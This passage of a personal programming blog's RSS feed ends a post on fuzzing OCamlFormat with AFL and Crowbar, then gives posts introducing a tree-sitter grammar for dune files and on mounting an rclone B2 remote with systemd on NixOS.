the part in the middle is actually an integer literal with value <code>"(*a*) (*bb*)"</code> (integer literals are represented as strings so that <a href="https://github.com/Drup/Zarith-ppx">a third party
library could add literals for arbitrary precision numbers</a> for
example).</p>
<p>AFL comes with a program called <code>afl-tmin</code> that is used to minimize a crash. It
will try to find a smaller example of a program that crashes OCamlFormat. It
works well even with Crowbar in between. For example it is able to turn <code>(new aaaaaa &amp; [0;0;0;0])[@aaaaaaaaaa]</code> into <code>(0&amp;0)[@a]</code> (neither AFL nor OCamlFormat
knows about types, so they can operate on nonsensical programs. Finding a
well-typed version of a crash is usually not very difficult, but it has to be
done manually).</p>
<p>In total, letting AFL run overnight on a single core (that is relatively short
in terms of fuzzing) caused 453 crashes. After minimization and deduplication,
this corresponded to <a href="https://github.com/ocaml-ppx/ocamlformat/issues?q=label%3Afuzz">about 30 unique issues</a>.</p>
<p>Most of them are related to attributes that OCamlFormat did not try to include
in the output, or where it forgot to add parentheses. Fortunately, there are
safeguards in OCamlFormat: since it checks that the formatting preserves the AST
structure, it will exit with an error instead of outputting a different program.</p>
<p>Once again, fuzzing has proved itself as a powerful technique to find actual
bugs (including high-level ones). A possible approach for a next iteration is to
try to detect more problems during formatting, such as finding cases where lines
are longer than allowed. It is also possible to extend the random program
generator so that it tries to generate comments, and let OCamlFormat check that
they are all laid out correctly in the output. We look forward to employing
fuzzing more extensively for OCamlFormat development in future.</p>]]></description>
    <pubDate>Mon, 03 Aug 2020 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2020-08-03-fuzzing-ocamlformat-with-afl-and-crowbar.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Introducing tree-sitter-dune</title>
    <link>http://blog.emillon.org/posts/2024-07-26-introducing-tree-sitter-dune.html</link>
    <description><![CDATA[<p>I made a <a href="https://tree-sitter.github.io/tree-sitter/">tree-sitter</a> plugin for
<code>dune</code> files. It is available <a href="https://github.com/emillon/tree-sitter-dune">on
GitHub</a>.</p>
<p>Tree-sitter is a parsing system that can be used in text editors.
<a href="https://dune.build/">Dune</a> is a build system for OCaml projects.
Its configuration language lives in <code>dune</code> files which use a s-expression
syntax.</p>
<p>This makes highlighting challenging: the lexing part of the language is very
simple (atoms, strings, parentheses), but it is not enough to make a good
highlighter.</p>
<p>In the following example, <code>with-stdout-to</code> and <code>echo</code> are “actions” that we
could highlight in a special way, but these names can also appear in places
where they are not interpreted as actions, and doing so would be confusing (for
example, we could write to a file named <code>echo</code> instead of <code>foo.txt</code>.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode scheme"><code class="sourceCode scheme"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a>(rule</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a> (action</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  (with-stdout-to</span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>   foo.txt</span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>   (echo <span class="st">&quot;testing&quot;</span>))))</span></code></pre></div>
<p>Tree-sitter solves this, because it creates an actual parser that goes beyond
lexing.</p>
<p>In this example, I created grammar rules that parse the contents of <code>(action ...)</code> as an action, recognizing the various constructs of this DSL.</p>
<p>The output of the parser is this syntax tree with location information (for
some reason, line numbers start at 0 which is normal and unusual at the same
time).</p>
<pre><code>(source_file [0, 0] - [5, 0]
  (stanza [0, 0] - [4, 22]
    (stanza_name [0, 1] - [0, 5])
    (field_name [1, 2] - [1, 8])
    (action [2, 2] - [4, 20]
      (action_name [2, 3] - [2, 17])
      (file_name_target [3, 3] - [3, 10]
        (file_name [3, 3] - [3, 10]))
      (action [4, 3] - [4, 19]
        (action_name [4, 4] - [4, 8])
        (quoted_string [4, 9] - [4, 18])))))</code></pre>
<p>The various strings are annotated with their type: we have stanza names
(<code>rule</code>), field names (<code>action</code>), action names (<code>with-stdout-to</code>, <code>echo</code>), file
names (<code>foo.txt</code>), and plain strings (<code>"testing"</code>).</p>
<p>By itself, that is not useful, but it’s possible to write <em>queries</em> to make
this syntax tree do interesting stuff.</p>
<p>The first one is highlighting: we can set styles for various “patterns” (in
practice, I only used node names) by defining queries:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode scheme"><code class="sourceCode scheme"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a>(stanza_name) @function</span>
<span id="cb3-2"><a href="#cb3-2" aria-hidden="true" tabindex="-1"></a>(field_name) @property</span>
<span id="cb3-3"><a href="#cb3-3" aria-hidden="true" tabindex="-1"></a>(quoted_string) @string</span>
<span id="cb3-4"><a href="#cb3-4" aria-hidden="true" tabindex="-1"></a>(multiline_string) @string</span>
<span id="cb3-5"><a href="#cb3-5" aria-hidden="true" tabindex="-1"></a>(action_name) @keyword</span></code></pre></div>
<p>The parts with <code>@</code> map to “highlight groups” used in text editors.</p>
<p>Another type of query is called “injections”. It is used to link different
types of grammars together. For example, <code>dune</code> files can start with a special
comment that indicates that the rest of the file is an OCaml program. In that
case, the parser emits a single <code>ocaml_syntax</code> node and the following injection
indicates that this file should be parsed using an OCaml parser:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode scheme"><code class="sourceCode scheme"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a>((ocaml_syntax) @injection.content</span>
<span id="cb4-2"><a href="#cb4-2" aria-hidden="true" tabindex="-1"></a> (#<span class="kw">set!</span> injection.language <span class="st">&quot;ocaml&quot;</span>))</span></code></pre></div>
<p>Another use case for this is <code>system</code> actions: these strings in <code>dune</code> files
could be interpreted using a shell parser.</p>
<p>In the other direction, it is possible to inject <code>dune</code> files into another
document. For example, a markdown parser can use injections to highlight code
blocks.</p>
<p>I’m happy to have explored this technology. The toolchain seemed complex at
first: there’s a compiler which seems to be a mix of node and rust, which
generates C, which is compiled into a dynamically loaded library; but this is
actually pretty well integrated in nix and neovim to the details are made
invisible.</p>
<p>The testing mechanism is similar to the cram tests we use in Dune, but I was a
bit confused with the colors at first: when the output of a test changes, Dune
considers that the new output is a <code>+</code> in the diff, and highlights it in green;
while tree-sitter considers that the “expected output” is green.</p>
<p>There are many ways to improve this prototype: either by adding queries (it’s
possible to define text objects, folding expressions, etc), or by improving
coverage for <code>dune</code> files (in most cases, the parser uses a s-expression
fallback). I’m also curious to see if it’s possible to use this parser to
provide a completion source. Since the strings are tagged with their type (are
we expecting a library name, a module name, etc), I think we could use that to
provide context-specific completions, but that’s probably difficult to do.</p>
<p>Thanks <a href="https://x.com/teej_dv">teej</a> for the initial idea and the useful
resources.</p>]]></description>
    <pubDate>Fri, 26 Jul 2024 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2024-07-26-introducing-tree-sitter-dune.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>
<item>
    <title>Using rclone mount with systemd on nixos</title>
    <link>http://blog.emillon.org/posts/2025-06-02-using-rclone-mount-with-systemd-on-nixos.html</link>
    <description><![CDATA[<p>I recently added a b2 remote to one of my nixos systems. I found some docs
recommending a systemd service but this felt like the wrong abstraction.</p>
<p>So I opted to turn that into a systemd mount. In the spirit of “let’s write a
blog post so that I don’t forget”, here’s how to do it.</p>
<p>Here’s the nix module. Replace the contents of <code>let</code> with your configuration.
I’m mounting a b2 bucket, but this should work with another kind of remote.</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode nix"><code class="sourceCode nix"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="op">{</span> <span class="va">pkgs</span><span class="op">,</span> <span class="va">lib</span><span class="op">,</span> <span class="op">...</span> <span class="op">}</span>:</span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="kw">let</span></span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a>  <span class="va">mountPoint</span> <span class="op">=</span> <span class="st">&quot;/mnt/where&quot;</span><span class="op">;</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a>  <span class="va">remoteName</span> <span class="op">=</span> <span class="st">&quot;rclone-remote-name&quot;</span><span class="op">;</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>  <span class="va">bucketName</span> <span class="op">=</span> <span class="st">&quot;bucket-name&quot;</span><span class="op">;</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>  <span class="va">configFile</span> <span class="op">=</span> <span class="st">&quot;/etc/rclone-mnt.conf&quot;</span><span class="op">;</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a><span class="kw">in</span></span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a><span class="op">{</span></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a>  <span class="va">environment</span>.<span class="va">systemPackages</span> <span class="op">=</span> <span class="kw">with</span> pkgs<span class="op">;[</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a>    rclone</span>
<span id="cb1-11"><a href="#cb1-11" aria-hidden="true" tabindex="-1"></a>  <span class="op">];</span></span>
<span id="cb1-12"><a href="#cb1-12" aria-hidden="true" tabindex="-1"></a>  <span class="va">systemd</span>.<span class="va">mounts</span> <span class="op">=</span> lib<span class="op">.</span>singleton <span class="op">{</span></span>
<span id="cb1-13"><a href="#cb1-13" aria-hidden="true" tabindex="-1"></a>    <span class="va">where</span> <span class="op">=</span> mountPoint<span class="op">;</span></span>
<span id="cb1-14"><a href="#cb1-14" aria-hidden="true" tabindex="-1"></a>    <span class="va">what</span> <span class="op">=</span> <span class="st">&quot;</span><span class="sc">${</span>remoteName<span class="sc">}</span><span class="st">:</span><span class="sc">${</span>bucketName<span class="sc">}</span><span class="st">&quot;</span><span class="op">;</span></span>
<span id="cb1-15"><a href="#cb1-15" aria-hidden="true" tabindex="-1"></a>    <span class="va">type</span> <span class="op">=</span> <span class="st">&quot;rclone&quot;</span><span class="op">;</span></span>
<span id="cb1-16"><a href="#cb1-16" aria-hidden="true" tabindex="-1"></a>    <span class="va">options</span> <span class="op">=</span> <span class="st">&quot;_netdev,args2env,allow_other,vfs-cache-mode=full,config=</span><span class="sc">${</span>configFile<span class="sc">}</span><span class="st">&quot;</span><span class="op">;</span></span>
<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a>  <span class="op">};</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a>  <span class="va">systemd</span>.<span class="va">automounts</span> <span class="op">=</span> lib<span class="op">.</span>singleton <span class="op">{</span></span>
<span id="cb1-19"><a href="#cb1-19" aria-hidden="true" tabindex="-1"></a>    <span class="va">where</span> <span class="op">=</span> mountPoint<span class="op">;</span></span>
<span id="cb1-20"><a href="#cb1-20" aria-hidden="true" tabindex="-1"></a>    <span class="va">wantedBy</span> <span class="op">=</span> <span class="op">[</span> <span class="st">&quot;multi-user.target&quot;</span> <span class="op">];</span></span>
<span id="cb1-21"><a href="#cb1-21" aria-hidden="true" tabindex="-1"></a>  <span class="op">};</span></span>
<span id="cb1-22"><a href="#cb1-22" aria-hidden="true" tabindex="-1"></a><span class="op">}</span></span></code></pre></div>
<p>And the contents of <code>/etc/rclone-mnt.conf</code> (not managed by nix to avoid secrets
going to the store - I haven’t found a way for rclone to read the b2 key from a
file).</p>
<pre><code>[rclone-remote-name]
type = b2
hard_delete = True
account = 01234
key = 5678</code></pre>
<p>With this in place, nixos will attempt to mount the remote when ready
(<code>"multi-user.target"</code> - apparently you rarely want to use <code>"default.target"</code>)
and it knows that it requires network access (the <code>"network-online.target"</code> is
implied by the pseudo option <code>_netdev</code>).</p>]]></description>
    <pubDate>Mon, 02 Jun 2025 00:00:00 UT</pubDate>
    <guid>http://blog.emillon.org/posts/2025-06-02-using-rclone-mount-with-systemd-on-nixos.html</guid>
    <dc:creator>Etienne Millon</dc:creator>
</item>

    </channel>
</rss>
